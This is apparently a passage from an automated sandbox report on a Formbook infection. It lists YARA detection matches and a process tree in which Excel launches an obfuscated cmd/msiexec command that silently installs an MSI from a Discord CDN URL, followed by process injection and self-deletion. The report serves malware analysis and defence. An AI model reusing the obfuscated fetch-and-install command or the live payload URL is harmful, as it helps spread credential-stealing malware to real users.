Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_02230D3B | 9_2_02230D3B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0220CD5B | 9_2_0220CD5B |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0229FDDD | 9_2_0229FDDD |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0009E071 | 9_2_0009E071 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_0009E5FC | 9_2_0009E5FC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082D87 | 9_2_00082D87 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082D90 | 9_2_00082D90 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00089E30 | 9_2_00089E30 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_00082FB0 | 9_2_00082FB0 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E9862 | 9_2_024E9862 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E1069 | 9_2_024E1069 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E1072 | 9_2_024E1072 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E8132 | 9_2_024E8132 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EDA6F | 9_2_024EDA6F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EAA32 | 9_2_024EAA32 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024EDB0E | 9_2_024EDB0E |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E5B1F | 9_2_024E5B1F |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E5B22 | 9_2_024E5B22 |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E2CEC | 9_2_024E2CEC |
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 9_2_024E2CF2 | 9_2_024E2CF2 |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | |
Source: unknown | Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe | |
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe | |
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\Installer\MSID8B1.tmp | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\wininit.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX | |
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX | |